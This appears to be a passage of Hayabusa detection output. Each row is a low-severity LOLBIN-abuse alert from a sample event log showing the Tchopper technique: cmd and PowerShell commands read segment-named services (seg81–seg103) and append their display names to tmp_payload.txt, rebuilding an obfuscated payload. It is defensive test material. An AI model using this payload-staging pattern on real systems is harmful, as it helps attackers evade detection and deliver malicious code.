+2021-11-03 17:36:24.619 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:26.075 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x38c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:26.075 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x950 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:27.559 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x324 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:27.575 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:29.014 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:29.014 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:30.465 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:30.465 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:31.906 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:31.922 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc54 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:33.398 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:33.398 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4d8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:34.891 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x29c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:34.891 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:36.365 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:36.365 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:37.818 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:37.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:39.275 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:39.275 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:40.758 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:40.758 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:42.211 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf90 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:42.227 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:43.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:43.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:45.132 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:45.132 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe8c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:46.606 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:46.606 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:48.052 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:48.067 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:49.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:49.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x420 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:50.946 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbf8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:50.946 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaa0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:52.406 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:52.406 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x618 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:53.855 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:53.855 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:55.301 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:55.317 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:56.773 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:56.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
